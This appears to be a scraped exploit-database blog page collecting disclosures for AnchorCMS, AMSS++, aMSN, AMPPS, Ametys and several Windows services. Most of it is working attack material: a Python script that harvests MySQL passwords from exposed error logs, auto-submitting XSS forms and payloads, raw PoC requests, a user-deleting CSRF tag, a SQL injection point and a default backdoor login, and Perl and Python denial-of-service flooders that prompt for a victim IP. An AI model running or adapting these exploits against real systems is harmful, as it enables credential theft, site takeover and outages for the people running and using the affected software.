# Exploit Title: Andrea ST Filters Service 1.0.64.7 - 'Andrea ST Filters Service ' Unquoted Service Path
# Discovery by: Roberto Piña
# Discovery Date: 2020-04-28
# Vendor Homepage: https://andreaelectronics.com/
# Software Link : https://andreaelectronics.com/
# Tested Version: 1.0.64.7
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Andrea" | findstr /i /v """
Andrea ST Filters Service AESTFilters C:\Program Files\IDT\WDM\AESTSr64.exe Auto
C:\>sc qc AESTFilters
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863108981
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Information disclosure (MySQL password) in error log
# Date: 2/10/2019
# Exploit Author: Tijme Gommers (https://twitter.com/finnwea/)
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://github.com/anchorcms/anchor-cms/releases
# Version: 0.12.3a
# Tested on: Linux
# CVE : CVE-2018-7251
# By default, AnchorCMS will log errors to the "/anchor/errors.log" file in the webroot of the web application. This allows malicious users to access the error log and view potentally sensitive information. Sometimes the AnchorCMS error log contains ocurrences of the MySQL error "Can't connect to MySQL server on 'xxx.xxx.xxx.xxx' (111)". When this error occurs the variables of the MySQL connector class are serialized into a JSON object and logged to the error log.
import re
import sys
import importlib
def get_plain(url):
try:
plain_result = requests.get(url=url)
return plain_result
except:
return None
def print_usage():
print('Usage: {0} <url>'.format(__file__))
if __name__ == '__main__':
# Ensure we have the URL
if len(sys.argv) != 2:
print_usage()
sys.exit(1)
print("* Using AnchorCMS website: " + sys.argv[1])
print("* Trying to import 'requests' module")
requests_loader = importlib.util.find_spec('requests')
requests_module_found = requests_loader is not None
if requests_module_found:
import requests
else:
print("* 'requests' module not found, please install it using pip")
print("* pip install requests")
sys.exit(1)
json_url = sys.argv[1].strip("/") + "/anchor/errors.log"
print("* Trying to get errors.log file at: {}".format(json_url))
plain_result = get_plain(json_url)
if plain_result == None:
print("* URL could not be requested, errors.log is probably not exposed")
sys.exit(1)
print("* Found data {}, trying to parse it now".format(plain_result))
lines = re.findall(r'"line":\d', plain_result.text)
print("* Found {} error entries".format(len(lines)))
passwords = re.findall(r'\[([^\[\]]*)"password"([^\[\]]*)\]', plain_result.text)
print("* Found {} passwords entries".format(len(passwords)))
for password in passwords:
print("+ {}".format(password))
source: https://www.securityfocus.com/bid/53181/info
Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.
Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected.
<html>
<title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title>
<body bgcolor="#000000">
<script type="text/javascript">
function xss0(){document.forms["xss0"].submit();}
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
function xss3(){document.forms["xss3"].submit();}
function xss4(){document.forms["xss4"].submit();}
function xss5(){document.forms["xss5"].submit();}
</script>
<form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
<input type="hidden" name="user" value='"><script>alert(1);</script>' />
<input type="hidden" name="pass" value="admin" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="email" value='"><script>alert(1);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="comments" value="1" />
<input type="hidden" name="css" value="" />
<input type="hidden" name="description" value="ZSL" />
<input type="hidden" name="html" value="1" />
<input type="hidden" name="js" value="" />
<input type="hidden" name="slug" value='"><script>alert(2);</script>' />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
<input type="hidden" name="name" value='"><script>alert(1);</script>' />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="hidden" name="content" value="Zero Science Lab" />
<input type="hidden" name="slug" value="ZSL" />
<input type="hidden" name="status" value="published" />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
<input type="hidden" name="real_name" value='"><script>alert(1);</script>' />
<input type="hidden" name="bio" value="MK" />
<input type="hidden" name="email" value='"><script>alert(3);</script>' />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="role" value="administrator" />
<input type="hidden" name="status" value="active" />
<input type="hidden" name="username" value='"><script>alert(2);</script>' />
</form>
<form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
<input type="hidden" name="auto_published_comments" value="1" />
<input type="hidden" name="description" value='"><script>alert(1);</script>' />
<input type="hidden" name="home_page" value="1" />
<input type="hidden" name="posts_page" value="1" />
<input type="hidden" name="posts_per_page" value="1" />
<input type="hidden" name="save" value="" />
<input type="hidden" name="sitename" value='"><script>alert(2);</script>' />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="twitter" value='"><script>alert(3);</script>' />
</form>
<br /><br />
<a href="javascript: xss0();" style="text-decoration:none">
<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
<a href="javascript: xss3();" style="text-decoration:none">
<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
<a href="javascript: xss4();" style="text-decoration:none">
<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
<a href="javascript: xss5();" style="text-decoration:none">
<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
<a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a>
</body></html>
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
# Date: 04/28/2024
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://anchorcms.com/
# Software Link:
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
# Version: latest
# Tested on: MacOS
# Log in to Anchor CMS.
# Click on "Create New Post".
# Fill in the "Title" and enter the following payload in the field
immediately below:
# "><script>alert()</script>
# Go to the homepage, and you will see the alert!
### PoC Request ###
POST /anchor/admin/posts/edit/2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
anchorcms=hlko7b1dbdpjgn58himf2obht5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
# Exploit Title: Anchor CMS 0.12.7 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-09-24
# Exploit Author: Sinem Şahin
# Vendor Homepage: https://anchorcms.com/
# Version: 0.12.7
# Tested on: Windows & XAMPP
==> Tutorial <==
1- Go to the following url. => http://(HOST)/admin/
2- Login to admin panel.
3- Press "Posts" button.
4- Write XSS Payload into the description of the post.
5- Press "Save" button.
6- Go to the post.
XSS Payload ==> "><script>alert("XSS")</script>
==> HTTP Request <==
POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: /
Origin: http://(HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://(HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close
token=mWgKk1tbYN6HAcj0jr6K2VKxBf6C311uemwTIrmEaHIi0zQpe7pNfHVm7zcoa3Fi&title=Post+Title&markdown=%0A&slug=hello-world&created=2020-09-24%2019%3A07%3A10
&description=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E&status=published&category=1&css=&js=&autosave=false
# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
# Exploit Author: Ninad Mishra
# Vendor Homepage: https://anchorcms.com/
# Software Link: https://anchorcms.com/download
# Version: 0.12.7
# CVE : CVE-2020-23342
###PoC
the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
================================
<img src="http://target/anchor/index.php/admin/users/delete/21">
================================
Where (21) is the user id .
When admin clicks on exploit.html link
User with id 21 will be deleted
# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
# Date: 2021-10-01
# Exploit Author: Ramazan Mert GÖKTEN
# Vendor Homepage: anchorcms.com
# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
# Affected Version: [ 0.12.7 ]
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: markdown
# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>
# Description
Exploitation of vulnerability as shown below;
1-) Entering the Admin Panel ( vulnerableapplication.com/anchor/admin )
2-) Click Create a new post button at the Posts tab ( From "vulnerableapplication.com/anchor/admin/posts " to "vulnerableapplication.com/anchor/admin/posts/add " )
3-) Relevant payload (<script>prompt("RMG_XSS_PoC")</script>) which was defined above entering the markdown parameter then click "save" button
4-) Finally, turn back the home page then shown the triggered vulnerability
# Proof of Concepts:
Request;
POST /anchor/admin/posts/add HTTP/1.1
Host: vulnerableapplication.com
Connection: close
Content-Length: 234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://vulnerableapplication.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableapplication.com/anchor/admin/posts/add
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9
Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1;
_ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1
token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false
Response;
HTTP/1.1 200 OK
Date: Sun, 10 Jan 2021 12:50:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
X-Robots-Tag: noindex,nofollow
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 105
{"id":"3","notification":"Your new article was
created","redirect":"\/anchor\/admin\/posts\/edit\/3"}
# Title : AMSS++ v 4.31 - 'id' SQL Injection
# Author : indoushka
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
# CVE: N/A
# poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /modules/mail/main/maildetail.php?id=174
[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
# Title: AMSS++ 4.7 - Backdoor Admin Account
# Author: indoushka
# Date: 2020-02-23
# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Login : admin & 1234
[+] http://127.0.0.1/innoobec/index.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================
source: https://www.securityfocus.com/bid/55381/info
aMSN is prone to a remote denial-of-service vulnerability.
A successful exploit of this issue allows remote attackers to crash the affected application, denying service to legitimate users.
#!/usr/bin/perl
use IO::Socket;
$x = 0;
print q(
**************************************
* AMSN REMOTE DOS XPL *
* BY *
* Red-Point *
* red-point@odiameporserelite.org *
**************************************
);
print q(Victim IP: );
$hos = <STDIN>;
chop ($hos);
print q( );
$type = seC0de;
chop ($type);
if($type == seC0de){
while($x != 9999999){
$postit = "";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$hos",
PeerPort => "6891",
Proto => "tcp",
);
die "\nEl host esta fuera de servicio o no estas conectado a internet $!\n" unless $sock;
print $sock "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D".
"\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00".
"\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44".
"\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47".
"\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00".
"\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48".
"\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E".
"\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A".
"\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49".
"\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A".
"\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D".
"\x49\x48\x44\x52";
close($sock);
syswrite STDOUT, "|";
$x++;
}
}
else{
die " \n";
}
# Exploit Title: AMPPS 2.7 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.ampps.com/
# Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe
# Version: 2.7
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
#!/usr/bin/python
import socket
print """
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo----
AMPPS 2.7
Ihsan Sencan
---------------Ooooo----
( )
ooooO ) /
( ) (_/
\ (
\_)
"""
Ip = raw_input("[Ip]: ")
Port = 80 # Default port
d=[]
c=0
while 1:
try:
d.append(socket.create_connection((Ip,Port)))
d[c].send("BOOM")
print "Sie!"
c+=1
except socket.error:
print "Done!"
raw_input()
break
source: https://www.securityfocus.com/bid/47756/info
Ampache is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Ampache 3.5.4 is vulnerable; other versions may also be affected.
<html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/ampache-3.5.4/login.php"> <input type="hidden" name="username" value=""><script>alert(0)</script>" /> </form> </body> </html>
#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: Amica Prodigy 1.7 - Privilege Escalation
# Date: 2021-08-06
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://gestionaleamica.com - https://www.bisanziosoftware.com
# Software Link: https://gestionaleamica.com/Download/AmicaProdigySetup.exe
# Version: 1.7
# Tested on: Windows 10 Pro 20H2 x64
# CVE: CVE-2021-35312
Amica Prodigy it's a backup solution from Amica softwares (GestionaleAmica: invoices, accounting, etc.,
from website gestionaleamica.com), a CIR 2000 srl / Bisanzio Software srl
A vulnerability was found in CIR 2000 / Gestionale Amica Prodigy v1.7. The Amica Prodigy's executable
"RemoteBackup.Service.exe" has incorrect permissions, allowing a local unprivileged user to replace it
with a malicious file that will be executed with "LocalSystem" privileges at scheduled time.
C:\Users\user>icacls C:\AmicaProdigy\RemoteBackup.Service.exe
C:\AmicaProdigy\RemoteBackup.Service.exe
NT AUTHORITY\Authenticated Users:(I)(M) NT
AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX) Elaborazione completata per 1 file.
# Exploit Title: Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
# Exploit Author: Vulnerability-Lab
# Date: 21/01/2022
Document Title:
===============
Ametys v4.4.1 CMS - Cross Site Scripting Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2275
Release Date:
=============
2022-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
2275
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Build powerful and stunning websites. Whether you need an advanced corporate website, a powerful landing page, a professionnal blog or
an event website, all the tools to make creative digital experiences are at your fingertips with Ametys. No coding skills needed.
Ametys make it easy for everyone to create and manage unified digital platform. Ametys delivers simple and intuitive interface with
a familiar ribbon Office style interface.
(Copy of the Homepage:https://www.ametys.org/community/en/ametys-platform/ametys-portal/overview.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation web vulnerability in the Ametys v4.4.1 cms web-application.
Affected Product(s):
====================
Ametys
Product: Ametys v4.4.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Ametys v4.4.1 cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The vulnerability is located in the input fields of the link text, small description and description in the add external link function.
The function is for example located in the link directory of the backend. Added links are listed with status and details.
Attackers with low privileges are able to add own malformed link with malicious script code in the marked vulnerable parameters.
After the inject the links are being displayed in the backend were the execute takes place on preview of the main link directory.
The attack vector of the vulnerability is persistent and the request method to inject is post.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Link Directory (Add)
Vulnerable Function(s):
[+] add (External Link)
Vulnerable Parameter(s):
[+] Link Text
[+] Small description
[+] Description
Affected Module(s):
[+] Frontend (Main Link Listing)
[+] Backend (Link Directory)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with low privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the application path and login to the service as restricted user that allowed to create links
2. Open the link directory and create a new link (top|left)
3. Inject the test payloads to the link text, small description and description and save via post
4. On visit of the link directory the payloads executes in the backend listing or frontend
5. Successful reproduce of the persistent web vulnerability!
Payload(s):
<a onmouseover=alert(document.domain)>poc_link</a>
<a onmouseover=alert(document.cookie)>poc_link</a>
Vulnerable Source: Link Directory - Link (Add)
class="x-grid-cell-inner " style="text-align:left;"
<a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7478 x-unselectable"
style="width: 248px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7478"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;"><a onmouseover="alert(document.domain)">poc_link</a></div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7479
x-unselectable" style="width: 247px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7479"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;"> </div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7480 x-grid-cell-last x-unselectable" style="width:
148px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7480"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">
</div></td></tr></tbody></table><table id="tableview-7474-record-105" role="presentation" data-boundview="tableview-7474" data-recordid="105"
data-recordindex="1" class="x-grid-item x-grid-item-selected x-grid-item-alt" style=";width:0" cellspacing="0" cellpadding="0"><tbody><tr class="
x-grid-row" role="row"><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7475 x-grid-cell-first x-unselectable" style="width: 396px;"
role="gridcell" tabindex="-1" data-columnid="gridcolumn-7475"><div unselectable="on" class="x-grid-cell-inner " style="text-align:left;">
<span class="a-grid-glyph ametysicon-link23"></span>test.de</div></td><td class="x-grid-cell x-grid-td x-grid-cell-gridcolumn-7476 x-unselectable"
style="width: 149px;" role="gridcell" tabindex="-1" data-columnid="gridcolumn-7476"><div unselectable="on" class="x-grid-cell-inner "
style="text-align:left;">Normal</div></td>
--- PoC Session Logs (POST) ---
https://ametys.localhost:8000.localhost:8000/cms/plugins/core-ui/servercomm/messages.xml
Host: ametys.localhost:8000.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1197812616356669894551519312
Content-Length: 798
Origin: https://ametys.localhost:8000.localhost:8000
Connection: keep-alive
Referer: https://ametys.localhost:8000.localhost:8000/cms/www/index.html
Cookie: JSESSIONID=A1DC067A1739FDFBC72BCF921A5AA655;
AmetysAuthentication=YW1ldHlzX2RlbW9fdXNlcnMjd2VibWFzdGVyI1A5WndHNTNzNmJhYlRWSDI;
JSESSIONID=A0EC6E56FC3A2131C9D24C33CB9CCAAA
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
content={"0":{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-announcement/view.xml"},"1":
{"pluginOrWorkspace":"core-ui","responseType":"xml","url":"system-startuptime.xml"}}&context.parameters=
{"siteName":"www","skin":"demo","debug.mode":"false","populationContexts":["/sites/www","/sites-fo/www"],"user":
{"login":"testuser_restricted","population":"ametys_demo_users","firstname":"testuser_restricted","lastname":"User","fullname":"testuser_restricted User",
"email":"testuser_restricted@test.com","populationLabel":"Ametys Demo Users","locale":"en"}}
-
POST: HTTP/1.1 200
Server: Apache/2.4.29 (Ubuntu)
X-Cocoon-Version: 2.1.13
Ametys-Dispatched: true
Content-Type: text/xml
Via: 1.1 ametys.localhost:8000.localhost:8000
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Language: fr
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the input fields in the external link add function of the link directory.
In a second step the input fields can be restricted for special chars to prevent further attacks.
As next step the output location were the links are being displayed (frontend & backend) should to be sanitized correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the ametys web-application cms is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
## Vulnerability Summary
The following advisory describes a password reset vulnerability found in Ametys CMS version 4.0.2
